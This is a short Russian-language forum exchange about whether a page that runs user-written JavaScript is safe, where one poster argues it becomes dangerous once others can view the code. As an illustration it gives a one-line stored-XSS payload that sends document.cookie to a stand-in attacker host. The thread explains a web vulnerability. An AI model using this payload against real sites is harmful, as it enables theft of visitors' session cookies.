qwertyuiop10, потому что Ваш подход небезопасен.

B@rmaley.e><e,

Ну так я же спрашиваю: почему небезопасен? Поточнее пожалуйста.

Вам же сказали - если человек может воспользоваться этим только для себя - всё нормально.
Но если он может показать написанное другим, то нет.

Сам себе человек и так может что угодно запустить на вашей странице.
Если же он может дать другим посмотреть написанное, то нет ничег проще чем написать например:

document.write('<img src="http://l33thaxor.net/?'+encodeURIComponent(document.cookie)+'">')

Ну а на счет мини-подигона на xiper.net? Там юзер меняет только в своём браузере. И вообще, не видел ни одного полигона, реализованного без обращения к серверу, хотя везде пользователь меняет страницы в своём браузере.

Хз как оно там: может статьи пишутся юзерами,мож задел на будущее, who cares.